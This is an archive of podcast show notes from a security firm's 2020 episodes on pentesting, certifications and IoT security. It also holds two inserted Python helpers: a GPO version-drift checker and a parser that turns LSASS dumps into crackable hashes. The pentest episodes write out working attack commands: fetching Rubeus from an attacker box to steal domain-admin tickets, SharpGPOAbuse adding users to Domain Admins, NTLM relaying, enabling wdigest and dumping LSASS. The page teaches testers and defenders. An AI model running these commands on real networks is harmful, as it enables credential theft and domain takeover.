    • When you're popping shells and privs all over the place in the lab, it can be confusing to figure out which machines you have what privileges on. I like using the klist command. Or, from a mimikatz prompt, try kerberos::list /export.


    7MS #445: Certified Red Team Professional Dec 09, 2020

    Welp, I need another certification like I need a hole in the head, but that didn't stop me from signing up for the Certified Red Team Professional. So I've started a series on sharing what I'm learning as I proceed through the certification path. (We're also talking about this on the 7MS forums)

    Here are some of the highlights from week 1:

    • Boy oh boy is PowerView handy for extracting juicy info out of Active Directory. It works well when served with a side order of the Microsoft signed DLL for the ActiveDirectory PowerShell module

    • I wouldn't say this course is for beginners. You will get some high level intro to PowerShell, Active Directory and pentesting, but you will need to do a ton of self-study and banging around in the lab to fill in some skill gaps.

    • When trying to pop a Jenkins box, I learned about a few new helpful tools I'd never played with before:

      • HFS - simple HTTP file server
      • Powercat - for catching shells!

    Then on a personal front, I have a few updates to share as well:

    • The Thanksgiving surprise that brought tears to my eyes

    • The new piece of exercise equipment in the Johnson household that made my wife reach for a barf bag

    • A mysterious sound in the house that led to the discovery of dead things over Thanksgiving break


    7MS #444: Interview with Christopher Fielder of Arctic Wolf Dec 02, 2020

    Happy December! Today I virtually sat down with Christopher Fielder of Arctic Wolf, who started his career in security at 18 (I was just playing a lot of video games when I was that old)! Christopher has served in the Air Force, worked for a university and SANS, served for some three-letter organizations - and more!

    Christopher and I had a great chat about a variety of security topics, including:

    • Threat hunting - why it's a term that means so many things to different people, how to get started in it and how to start building a threat hunting team

    • Threat intel - its relationship to threat hunting, and how to make sense of the jillions of intel feeds out there

    • Pentesting your MDR/SIEM - we talk about our gist on evaluating an MDR/SIEM, and how to throw some technical tests at these systems to figure out if they're worth the cost!


    7MS #443: Cyber News - Thankful for Patches Edition Nov 26, 2020

    Happy Thanksgiving! While the turkey and pie settle in your belly, why not also digest some fantastic security news stories with our pal Gh0sthax?

    Today's stories include:

    • It was another epic month of patching - both Threatpost and Krebs have great coverage of what you need to know.

    • We don't support software piracy, but it's interesting that we just got a demo of Cobalt Strike spun up, and now the source code has been leaked.

    • Always download software updates from their source, not from not-so-trustworthy sources like random search results in Google and pop-up boxes.

    • As a follow up to a story from last month, ransomware was not to blame for the death of a woman in Germany.


    7MS #442: Tales of Internal Network Pentest Pwnage - Part 23 Nov 19, 2020

    Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features:

    • Great blue team tools alerting our customer to a lot of the stuff we were doing
    • An EDR that we tried to beat up (but it beat us up instead)
    • SharpGPOAbuse which we talked about extensively last week
    • Separation of "everyday" accounts from privileged accounts
    • Multi-factor authentication bypass!
    • Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.

    The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds:

    SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap

    This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with:

    echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirbi

    Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight.

    We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!


    7MS #441: SharpGPOAbuse Nov 15, 2020

    Hello friends! Sorry to be late with this episode (again) but we've been heads-down in a lot of cool security work, coming up for air when we can! Today's episode features:

    • A little welcome music that is not the usual scatting of gibberish I torture you with

    • Some cool tools I'm playing with in the lab that we'll do future episodes on in the future:

      • DetectionLab to practice detecting all the bad things!
      • BadBlood to dirty up your AD (your test AD with groups, computers, permissions, etc.). I wish the user import script would let you choose a list of bad passwords to assign the users, but you can also run it manually if you want.
      • Cobalt Strike - we're doing a demo right now!

    Most of today's episode focuses on SharpGPOAbuse, a tool that can be used to abuse "generic write" access to GPOs (which you might identify after running BloodHound). Here's a sample syntax you could run:

    SharpGPOAbuse.exe --AddUserTask --TaskName "Totes Safe Windoze Updatez" --Author SAMPLECO\ADMINISTRATOR --Command "cmd.exe" --Arguments "/c net group \"Domain Admins\" SomeLowPrivUser /ADD DOMAIN" --GPOName "Name of GPO with Generic Write Access"

    This will push a ScheduledTasks.xml file to \\sample.company\Policies\LONG-STRING-REPRESENTING-THE-GPO-ID\User\Preferences\ScheduledTasks

    Now if you find that the task is not pushing correctly, it may be that SharpGPOAbuse.exe hasn't been able to update the GPT.INI file (in the root of the GPO path) and/or the versionNumber value assigned to the GPO itself. If you need to adjust the versionNumber and GPT.INI value manually, definitely read this Microsoft article so you know how the number is generated and how to increment it properly. This flippin' sweet RastaMouse blog article also helped this click for me.

    If you can't seem to update versionNumber using the PowerShell in Rasta's article, you can also open up ADSI Edit and navigate to Default naming context > DC=your,DC=com > CN=System > CN=Policies > CN=LONG-STRING-REPRESENTING-THE-GPO-ID then get the properties of the folder, scroll down and manually adjust the value for versionNumber.
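    As an added example (not the podcast's, SharpGPOAbuse's or Microsoft's code), here is a small Python check a defender can run against the two version counters discussed above: it decodes a GPO's 32-bit version into its User (upper 16 bits) and Computer (lower 16 bits) halves and compares the AD versionNumber with the Version key in the GPT.INI copy on SYSVOL. It assumes you have already retrieved the versionNumber attribute (e.g. via LDAP) and the GPT.INI text (e.g. via SMB); the GPO values below are constructed.

```python
"""Cross-check a GPO's two version counters.

Added example for this page's GPO discussion; not code from the podcast,
SharpGPOAbuse or Microsoft. A GPO's version lives in two places that must
agree: the versionNumber attribute on the groupPolicyContainer object in AD
and the Version key in GPT.INI at the root of the SYSVOL policy folder. Both
hold one 32-bit value: the upper 16 bits count User-configuration changes,
the lower 16 bits Computer-configuration changes. Clients re-apply a GPO only
when the number changes, so a SYSVOL-side edit that bumps GPT.INI without the
matching AD update (or the reverse) is exactly the mismatch described above,
and a cheap tamper signal for defenders to audit.
"""
import configparser
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class GpoVersion:
    user: int      # upper 16 bits of the 32-bit version
    computer: int  # lower 16 bits

    @classmethod
    def from_int(cls, value: int) -> "GpoVersion":
        if not 0 <= value <= 0xFFFFFFFF:
            raise ValueError(f"GPO version out of 32-bit range: {value}")
        return cls(user=(value >> 16) & 0xFFFF, computer=value & 0xFFFF)

    def to_int(self) -> int:
        return (self.user << 16) | self.computer


def parse_gpt_ini(text: str) -> GpoVersion:
    """Read the [General] Version key from GPT.INI text."""
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(text)
    return GpoVersion.from_int(int(parser["General"]["Version"]))


def check_consistency(ad_version_number: int, gpt_ini_text: str) -> Dict[str, object]:
    """Compare AD versionNumber with SYSVOL GPT.INI and list which halves drift."""
    ad = GpoVersion.from_int(ad_version_number)
    sysvol = parse_gpt_ini(gpt_ini_text)
    drift: List[str] = []
    if ad.user != sysvol.user:
        drift.append("user")
    if ad.computer != sysvol.computer:
        drift.append("computer")
    return {"ad": ad, "sysvol": sysvol, "drift": drift, "consistent": not drift}


# Constructed sample data (not from any real domain).
AD_VERSION_NUMBER = 65539  # 0x00010003 -> user=1, computer=3

GPT_INI_IN_SYNC = """[General]
Version=65539
displayName=Constructed Sample GPO
"""

# Same GPO after something bumped only the User half on SYSVOL (user=2, computer=3)
# without touching the AD attribute: the symptom discussed above.
GPT_INI_DRIFTED = """[General]
Version=131075
displayName=Constructed Sample GPO
"""

if __name__ == "__main__":
    for label, ini in (("in sync", GPT_INI_IN_SYNC), ("drifted", GPT_INI_DRIFTED)):
        result = check_consistency(AD_VERSION_NUMBER, ini)
        print(f"{label}: AD={result['ad']} SYSVOL={result['sysvol']} drift={result['drift']}")
```

    Because SharpGPOAbuse writes under the User\Preferences path, the User half is the one you would expect to move; a drift list of ["user"] with an unchanged AD attribute is worth a closer look at who touched SYSVOL.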


    7MS #440: Tales of Internal Network Pentest Pwnage - Part 22 Nov 08, 2020

    Hi! Sorry to be so late with this episode, but I'm excited to share with you another fun tale of pentest pwnage! Key points from today's episode include:

    • We do not do these episodes to brag or put down any company about their security posture. We do do (heh, I said "do do") these episodes to share what we're learning about pentesting so it helps you become a better network defender and/or offender!

    • Early in an engagement it can be fruitful to run Pcredz to find goodies in the clear like hashes, CC numbers, SNMP traps and more!

    • Run hashes right through the Hashes.org cracked Pwned Passwords list for more management-level impact on your efforts. Do the same with Kerberoastable accounts

    • Once you've gotten a local or domain admin account, use CrackMapExec to dump a workstation's local hashes, then do something VERY important that I just learned this week (details in today's episode) to maybe get insta-DA!


    7MS #439: Cyber News - Ransomware is Definitely Still a Thing Edition Oct 29, 2020

    Happy October and merry Halloween everybody! We're back with our buddy Joe "the machine" Skeen who is also now a Principal Security Engineer for 7MS! He's also working on a new cert, and speaking of certs, 7MS is now PCIP certified!

    Today's great cyber stories include:

    • Azure AD is a single point of failure in many networks

    • Ransomware sophistication continues to grow - as demonstrated in this story, this one and this one

    • Ransomware such as Ryuk can go from phishing email to total domain domination in 5 hours or less

    • Don't forget to patch - Microsoft remediated some doozies! Something like 0patch looks particularly interesting to aid in your patching efforts (not a sponsor, but maybe some day ;-)

    P.S. We've got a Halloween Webinar coming up Friday with our friends at Netwrix - sign up and we'll see you there!


    7MS #438: PCI Professional Certification (PCIP) - Part 4 Oct 21, 2020

    Yay - I'm a PCIP now! I welcome you to check out our past episodes on PCIP, but in some ways this will be the be all, end all episode on the topic. Today I cover:

    Study materials that helped me prepare:

    • PCIP book by Linda Jones (I couldn't actually get this one in time but it looks awesome!)
    • Flashcards from Cram
    • Flashcards from Quizlet
    • My flashcards from Quizlet (I'll need to sanitize these and give you the password. Contact me if interested)
    • Flashcards from ProProfs
    • Documentation from PCI Web site itself - specifically the glossary, quick reference guide and my personal favorite, the prioritized approach guidance

    I also talk about taking the exam from home which was an interesting experience (as well as a privacy/security mini nightmare!).


    7MS #437: Homecoming and Home ioT Security - Part 3 Oct 14, 2020

    Hello! This episode is a true homecoming in that I actually recorded it from home. Yay!

    WARNING!!! WARNING!!! This episode contains a ton of singing. If you don't like singing, do not listen!!!

    With that said, I wanted to follow up on part 1 and 2 of this series and share some additional cool tools that others have told me about in regards to securing and monitoring all your ioTs!

    • Home Assistant - is described on its Wikipedia page as "a free and open-source home automation software designed to be the central control system in a smart home or smart house." You can quickly grab the HA image and dump it on an SD card with Balena Etcher and be up and running in minutes. I found HA a bit overkill/complicated for my needs, but my pal Hackernovice (on 7MS Slack) says this video demonstrates why he really loves it.

    • Prometheus, recommended by our pal Mojodojo101, is "a systems and service monitoring system. It collects metrics from configured targets at given intervals, evaluates rule expressions, displays the results, and can trigger alerts if some condition is observed to be true." I found a great RPi install guide that will help you get it up and running in a snap. I love the capabilities and possibilities of Prometheus, but much like Home Assistant, it quickly got to "more than I need" territory.

    The final thing we talk about today is trying to answer this question: with so many of my ioTs tied to some cloud app/service, how do I keep these accounts themselves as secure as possible?

    Songs sung in this episode include:

    • Follow Through by Gavin DeGraw
    • Livin' on a Prayer
    • The Look that Says You Love Me (Brian Johnson)
    • Goodness of God

    7MS #436: Cleaning Up Your Cloud Clutter Oct 07, 2020

    Hey, hope you're having a great week! The last few weeks have had somewhat of a homecoming and home cleaning theme. To continue that train of thought, over the last few days I've gotten heavy into cleaning up my cloud clutter - cloud services, email, file sharing, etc. - in an effort to be more secure and have a reduced digital footprint. Today's tips include:

    • Double-check that any device you have that supports full-disk encryption has it enabled

    • On all your machines, clean up old straggler artifacts in C:, desktop folder, downloads folder, etc. Use the nifty built-in tools for Windows 10 to free up even more disk space (I just learned about this one recently - WinDirStat and TreeSize Free were my go-tos for years)

    • Got old PCs sitting around you're not using? Nuke 'em with DBAN.

    • Go into your password vault and clean out creds for services you don't use anymore (especially for old client projects!)

    • Purge your file share services (Dropbox, OneDrive, etc.) on a regular basis, and/or bring older archives over to cold (on-site) encrypted storage

    • Review your "bottleneck" accounts (key email accounts, for example) and review the devices/services linked to them - clean up and purge regularly

    • Handling password hashes? Here's one way to set up an encrypted partition for them

    • You can clean old email from Gmail quickly using some simple searches. You can also use Google Takeout to download offline copies of mail and then browse them later with Thunderbird


    7MS #435: Homecoming and Home ioT Security - Part 2 Oct 02, 2020

    Hi again! It's sort of fun to release two episodes in one week for a change. If you missed part 1 on our ioT security series, check it out here. Today we dive into some free/cheap monitoring solutions you can use to keep tabs on your ioT network (or any network, really):

    • Nagios - it's old school but gets the job done. This article helped me get it going on an RPi.

    • SolarWinds IP monitor - it was quick and easy to get up and running, but the 40 monitors you're allotted get burned up pretty quick if you have a decent number of devices to monitor

    • PRTG - this is the winner in my book. It has a generous amount of monitors, quick/easy install, and a native mobile app!


    7MS #434: Homecoming and Home ioT Security Oct 01, 2020

    WE'RE HOME! Almost a year after our fire, we're back, baby!

    This episode is somewhat of a homecoming that dovetails into an episode about ioT security. I've basically done a 180 degree spin on ioT stuff. I now love the coolness and convenience of these things while simultaneously being terrified of the security risks. Is there a happy balance somewhere between the two? Maybe. Today we dive into ioT security, specifically:

    • Setting up an ioT-dedicated wireless network
    • Quarantining it so it can only talk to the Internet
    • Poking holes in the firewall to allow ioT DNS requests to be captured
    • Scanning your ioT for services and potential default/weak cred use

    7MS #433: Cyber News - Security Skills Gap Edition Sep 23, 2020

    Hi! Today our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) has prepared some cyber-licious actionable news stories for us to chew on. Today's stories include:

    • Cybersecurity skills gap (powered by lack of career development!)

    • Which cyber jobs are hot - or not?

    • Mysterious wave of DDoS attacks

    • The Magecart threat group pwns thousands of ecommerce sites

    On a parting note, don't forget to patch your DCs against Zerologon! Here's a great Twitter thread breakdown that explains it in more detail


    7MS #432: Tales of Internal Network Pentest Pwnage - Part 21 Sep 16, 2020

    Yay! It's time for another tale of pentest pwnage! Highlights include:

    • Making sure you take multiple rounds of "dumps" to get all the delicious local admin creds.

    • Why lsassy is my new best friend.

    • I gave a try to using an Ubuntu box instead of Kali as my attacking system for this test. I had pretty good results. Here's my script to quickly give Ubuntu a Kali-like flair:

    #!/usr/bin/env bash
    sudo apt-get update
    sudo apt-get upgrade -y
    sudo apt-get install openssh-server -y
    sudo apt-get install nmap curl dnsrecon git net-tools open-vm-tools-desktop python3.8 python3-pip unzip wget xsltproc -y

    # Aha helps take output from testssl.sh and make it nice and HTML-y
    sudo git clone https://github.com/theZiz/aha.git /opt/aha

    # Awesome-nmap-grep makes it easy to grep nmap exports for just the data you need!
    sudo git clone https://github.com/leonjza/awesome-nmap-grep.git /opt/awesome-nmap-grep

    # bpatty is...well...bpatty!
    sudo git clone https://github.com/braimee/bpatty.git /opt/bpatty

    # CrackMapExec is...awesome
    sudo mkdir /opt/cme
    cd /opt/cme
    sudo curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.1.0dev/cme-ubuntu-latest.1.zip -L -o cme.zip
    sudo unzip cme.zip
    sudo chmod +x ./cme

    # eyewitness is a nice recon tool for putting some great visualization behind nmap scans
    sudo git clone https://github.com/FortyNorthSecurity/EyeWitness.git /opt/eyewitness
    cd /opt/eyewitness/Python/setup
    sudo ./setup.sh

    # impacket is "a collection of Python classes for working with network protocols"
    # I currently primarily use it for ntlmrelayx.py
    sudo git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
    cd /opt/impacket
    sudo pip3 install .

    # mitm6 is a way to tinker with ip6 and get around some ip4-level protections
    sudo git clone https://github.com/fox-it/mitm6.git /opt/mitm6
    cd /opt/mitm6
    sudo pip3 install -r requirements.txt

    # install service-identity
    sudo pip3 install service-identity

    # lsassy
    sudo python3 -m pip install lsassy

    # nmap-bootstrap-xsl turns nmap scan output into pretty HTML
    sudo git clone https://github.com/honze-net/nmap-bootstrap-xsl.git /opt/nmap-bootstrap-xsl

    # netcreds "Sniffs sensitive data from interface or pcap"
    sudo git clone https://github.com/DanMcInerney/net-creds /opt/netcreds

    # PCredz parses pcaps for sensitive data
    sudo git clone https://github.com/lgandx/PCredz /opt/pcredz

    # PowerSploit is "a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment"
    sudo git clone https://github.com/PowerShellMafia/PowerSploit.git /opt/powersploit

    # PowerUpSQL is a tool for discovering, enumerating and potentially pwning SQL servers!
    sudo git clone https://github.com/NetSPI/PowerUpSQL.git /opt/powerupsql

    # responder is awesome for LLMNR, NBT-NS and MDNS poisoning
    sudo git clone https://github.com/lgandx/Responder.git /opt/responder

    7MS #431: How to Succeed in Business Without Really Crying - Part 8 Sep 09, 2020

    Today we're talking business! We've got some exciting news and updates to share with you since we last did a "crying" episode last fall:

    • 7MS hired a VP of sales and marketing: Clyde Cooper!
    • We've added some new tools to our tools/services gist:
      • Having a true sales force for the first time has prompted us to invest in Salesforce. There are a few gotchas with signing up for a Salesforce trial and then migrating to a paid plan (discussed more in today's episode)
      • We're trying to "eat our own dog food" and part of that includes good inventory management. For that we've started to play with Rumble and reaaaaaaaaaaalllly like it
    • Recording an "about us" video with a production company is exciting, stressful and awkward
    • Today I met the guy who wins the Internet (or at least LinkedIn) - he sent me a personalized video with an idea I'm definitely going to steal for future marketing initiatives
    • For really no reason at all, I sing for you a bit in this episode
      • On that note, I absolutely love this song. I feel like it's my family's theme song for the last year.

    7MS #430: Interview with Dan DeCloss Sep 02, 2020

    Today we're thrilled to have our friend and PlexTrac CEO Dan DeCloss back to the program! (P.S. PlexTrac is launching runbooks as a feature - and you should definitely check out PlexTrac's upcoming Webinar about runbooks on September 9!). We also did a PlexTrac 101 Webinar with them recently!

    You may remember Dan from such podcasts as this one when we first talked to him in 2019. Dan and I have a lot in common in that we both started security companies about the same time, so I had a lot of questions for Dan around how business has been going since we last talked on the podcast. Today our topics/questions include:

    • What are the (good) warning signs that a passion project you have could be a viable business?

    • Why "having all the jobs there has ever been" is a great way to figure out it's time to start your own business :-)

    • At what point does a side project have to become what you do for your day job?

    • How do you safely prepare to leave a comfortable corporate life for life as a small biz owner? Do you go 100% on faith? Do you save your $ for a year so you can "float" your business for a while? Some combination of the two?

    • How important is it to have the support of your friends/family when starting a new biz?

    • Once you start a biz what are the best/worst things about wearing all the hats (engineering, sales, marketing, accounting, HR, etc.)?

    • When is it time to hire additional resources or raise additional money to support your growing business?

    • What marketing efforts are fruitful for a new security biz to spend time/money on?

    • How do you decide what bells/whistles to add to PlexTrac? Follow your own roadmap? Let the customers drive your direction? Some combo of both?

    • What new bells and whistles are coming to PlexTrac in the Webinar on September 9?! (Spoiler alert: RUNBOOKS!)


    7MS #429: Cyber News - Free Bitcoin for Everybody Edition Aug 26, 2020

    Hola! We're back again with our amigo Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include:

    • The Twitter hack that promised free Bitcoin for everybody - with good coverage by Krebs and Threatpost

    • Garmin's personal and painful experience with ransomware

    • Joe offers 7 tips any org can use to reduce their likelihood of getting pwned with an attack or ransomware

    • Are we ready to endure a cyber crisis?

    • Would you fall for this social engineering attack?


    7MS #428: Tales of Internal Network Pentest Pwnage - Part 20 Aug 19, 2020

    Welcome to another fun tale of internal pentest pwnage! Today's tale includes these helpful informational tidbits:

    • My understanding is that in order for mitm6 relay attacks to work against DCs, those DCs have to have LDAPS config'd properly. Use nmap -sV -p636 name.of.domain.controller to verify this (thanks to this site for the tip!)

    • PowerView is awesome when used with Find-InterestingDomainShareFile to find interesting files with the word password or sensitive or other helpful strings.

    • eavesarp helped me identify some weird hosts on weird subnets sending regular bursts of traffic to "interesting" hosts! Check out this video from Black Hills Infosec to learn more.

    I've also got some personal updates for you, including:

    • House updates
    • Fighting with the man/woman upstairs
    • My worst Webinar nightmare came true
    • A socially distanced wedding singing experience

    7MS #427: Interview with Ameesh Divatia from Baffle Aug 12, 2020

    Today we're thrilled to welcome Ameesh Divatia from Baffle back to the program. We first met Ameesh back in episode 349 and today he's back to discuss a slew of additional hot security topics, including:

    Misconfigured cloud databases

    • Why is this such a common issue, and how can we address it?
    • Wait wait wait...I just spun up a machine in Azure, AWS, Digital Ocean, etc. Isn't it secure because....it's the cloud?
    • What tools can we use to better secure our cloud databases?
    • How can we secure sensitive information as we migrate it from LAN side to the cloud?

    CCPA (California Consumer Privacy Act)

    • What is the CCPA? How does it relate to GDPR?
    • If I'm a Californian, what can I demand to know from companies as far as how they're using my data? What can't I demand to know?
    • Will CCPA inspire folks to scrub their data from the hands of big companies and go more "off the grid?"
    • Does CCPA only apply to California residents and companies?

    Secure data sharing

    • What are the current challenges with secure data sharing in terms of monitoring the flow of data within their systems and their partners’ systems, while addressing privacy concerns?

    • What are some of the common mistakes companies make when sharing sensitive data internally or with partners/clients?

    • What is Secure Multiparty Compute (SMPC) and how can it help with secure data sharing?


    7MS #426: Tales of Internal Pentest Pwnage - Part 19 Aug 07, 2020

    This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.

    First and foremost, I have to say that 7 Minute Security's official stance on toads is that nobody should be licking them at any time, for any reason. Also, I can neither confirm nor deny that toads can catch coronavirus. Listen to today's episode...it'll make more sense.

    We've got another swell tale of internal pentest pwnage for you today! Highlights include:

    • If you've collected a ton of hashes with Responder, the included DumpHash.py gives you a lovely organized list of collected hashes!

    • Here's one way you can grab the latest CME binary:

    curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

    Note to self: I must've been using outdated CME forever, because the correct syntax to get the wdigest flag is now a little different:

    cme smb HOST -u localadmin -H "hash" --local-auth -M wdigest -o ACTION=enable

    • If you're looking to block IPv6 (ab)use in your environment, this article has some great tips.

    • When testing in an environment with a finely tuned SIEM, I highly recommend you download all the Kali updates and tools ahead of time, as sometimes just the call out to kali.org gets flagged and alerted on to the security team

    • Before using the full hatecrack methodology, I like to run hashes straight through the list of PwnedPasswords from hashes.org (which appears to currently be offline) first to give the org an idea as to what users are using easy-to-pwn passwords.

    • A question for YOU reading this: what's the best way to do an LSASS dump remotely without triggering AV? I can't get any of the popular methods to work. So pypykatz is my go-to.

    • I learned that PowerView is awesome for finding attractive shares! Run it with Find-InterestingDomainShareFile to find, well, interesting files! Files with password or sensitive or admin in the title - and much more!

    • Got to use PowerUpSQL to audit some MS SQL sauce, and I found this presentation (specifically slide ~19) really helpful in locating servers I could log into and any SQL vulnerabilities the boxes were ripe for.


    7MS #425: DIY Pentest Dropbox Tips - Part 2 Jul 30, 2020

    Today's episode is all about creating and deploying your own pentest dropbox! In part 1 I talked about some "gotchas" but this time around I'm ready to dump a whole slug of specific and updated tips on ya! Below are the tips covered in this episode that are better read than said:

    For the Windows VM
    • Turn on RDP with PowerShell:
    Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
    Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    • Change time zone with command line:
    tzutil /s "Central Standard Time"
    • Install Chrome with PowerShell:
    $LocalTempDir = $env:TEMP; $ChromeInstaller = "ChromeInstaller.exe"; (new-object System.Net.WebClient).DownloadFile('http://dl.google.com/chrome/install/375.126/chrome_installer.exe', "$LocalTempDir\$ChromeInstaller"); & "$LocalTempDir\$ChromeInstaller" /silent /install; $Process2Monitor = "ChromeInstaller"; Do { $ProcessesFound = Get-Process | ?{$Process2Monitor -contains $_.Name} | Select-Object -ExpandProperty Name; If ($ProcessesFound) { "Still running: $($ProcessesFound -join ', ')" | Write-Host; Start-Sleep -Seconds 2 } else { rm "$LocalTempDir\$ChromeInstaller" -ErrorAction SilentlyContinue -Verbose } } Until (!$ProcessesFound)
    • Install PowerUpSQL:
    Install-Module -Name PowerUpSQL
    • Turn off sleepy time:
    powercfg.exe -change -standby-timeout-ac 0
    • Install DotNet 3.5:
    dism /online /Enable-Feature /FeatureName:"NetFx3"

    For the Kali VM
    • Refresh the SSH keys:
    apt install openssh-server -y
    mkdir /etc/ssh/default_keys
    mv /etc/ssh/ssh_host_* /etc/ssh/default_keys/
    dpkg-reconfigure openssh-server
    systemctl enable ssh.service
    systemctl start ssh.service
    • Get SharpHound and Mimikatz:
    wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200519/mimikatz_trunk.zip
    wget https://github.com/BloodHoundAD/BloodHound/raw/master/Ingestors/SharpHound.exe
    • Install pypykatz
    sudo pip3 install pypykatz
    • Install CrackMapExec binaries (which at time of this publication is this one):
    curl https://github.com/byt3bl33d3r/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip -L -o cme.zip

    7MS #424: Cyber News - Everything is Pwned Edition Jul 22, 2020

    Hello! We're back with our pal Joe "The Machine" Skeen (a.k.a. Gh0sthax) who has prepared some awesome and actionable news stories for us to digest. Today's stories include:

    • Hackers are trying to steal admin passwords from F5 devices
    • Secret service reports increase in hacked MSPs
    • Most Popular Home Routers Have ‘Critical’ Flaws
    • "SIGRed" DNS vulnerability in Microsoft DNS

    7MS #423: Tales of Internal Pentest Pwnage - Part 18 Jul 15, 2020

    This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:

    • Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
    • Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
    • Testing for MS14-025 is easy with this site.
    • mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:
    smb://CORP\Administrator@192.168.195.2
    smb://CORP\Administrator@192.168.195.3
    smb://CORP\brian.admin@192.168.195.7
    192.168.195.7
    192.168.195.10

    Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active SOCKS connections, you can connect through them directly with an interactive smbclient session, e.g. proxychains smbclient //192.168.195.2/C$ -U CORP/brian.admin (a share name is required; any password will do, because the relayed session is already authenticated).

    • I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ!

    • Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.

    • Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share

    • Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

    pip3 install pypykatz
    sudo pypykatz lsa minidump lsass.dmp > lsass.txt

    Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to munch on!
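    The "comb through lsass.txt" step can be scripted. The following is an added example written for this page, not pypykatz's own code and not something from the episode: it walks pypykatz's text output, keeps one copy of each domain\user/NT-hash triple found in the MSV blocks, drops machine accounts unless asked to keep them, flags the empty-password hash, and emits user:hash lines for hashcat. The sample output embedded in the block is constructed to match the shape of the pypykatz text format (headers like "== LogonSession ==" and "== MSV =="); it was not captured from a real host, and the only real value in it is the well-known NT hash of "password".

```python
import re
from typing import Dict, List

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# Constructed sample in the shape of pypykatz's 'lsa minidump' text output.
# Only 8846f7... (NT hash of 'password') is a real value; the rest is made up.
SAMPLE_LSASS_TXT = """\
== LogonSession ==
authentication_id 999999 (f423f)
session_id 2
username brian.admin
domainname CORP
logon_server DC01
    == MSV ==
        Username: brian.admin
        Domain: CORP
        LM: NA
        NT: 8846f7eaee8fb117ad06bdd830b7586c
        SHA1: 0123456789abcdef0123456789abcdef01234567
== LogonSession ==
authentication_id 996 (3e4)
session_id 0
username WS01$
domainname CORP
    == MSV ==
        Username: WS01$
        Domain: CORP
        LM: NA
        NT: 9a0ce7a7c2b8f0f4e7b0e77f1f3b2a1c
        SHA1: NA
== LogonSession ==
authentication_id 997 (3e5)
session_id 0
username LOCAL SERVICE
domainname NT AUTHORITY
    == MSV ==
        Username:
        Domain:
        LM: NA
        NT: NA
        SHA1: NA
== LogonSession ==
authentication_id 123456 (1e240)
session_id 3
username brian.admin
domainname CORP
    == MSV ==
        Username: brian.admin
        Domain: CORP
        LM: NA
        NT: 8846f7eaee8fb117ad06bdd830b7586c
        SHA1: 0123456789abcdef0123456789abcdef01234567
    == WDIGEST [1e240]==
        username brian.admin
        domainname CORP
        password None
"""


def parse_msv_credentials(text: str, include_machine_accounts: bool = False) -> List[Dict[str, str]]:
    """Extract de-duplicated (domain, username, NT hash) triples from the MSV blocks.

    The same credential normally shows up in several logon sessions, so the
    result keeps one entry per (domain, user, hash).  Sessions without a
    32-hex-char NT value ('NA', blank user) are ignored.
    """
    creds: List[Dict[str, str]] = []
    seen = set()
    in_msv = False
    current: Dict[str, str] = {}

    def flush() -> None:
        nonlocal current
        user = current.get("username", "").strip()
        domain = current.get("domain", "").strip()
        nt = current.get("nt", "").strip().lower()
        current = {}
        if not user or not re.fullmatch(r"[0-9a-f]{32}", nt):
            return
        if user.endswith("$") and not include_machine_accounts:
            return
        key = (domain.lower(), user.lower(), nt)
        if key in seen:
            return
        seen.add(key)
        creds.append({"domain": domain, "username": user, "nt": nt,
                      "empty_password": nt == EMPTY_NT})

    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("=="):          # any section header ends an MSV block
            if in_msv:
                flush()
            in_msv = line.startswith("== MSV ==")
            continue
        if not in_msv:
            continue
        field, sep, value = line.partition(":")
        if sep and field.strip().lower() in ("username", "domain", "nt"):
            current[field.strip().lower()] = value.strip()
    if in_msv:
        flush()
    return creds


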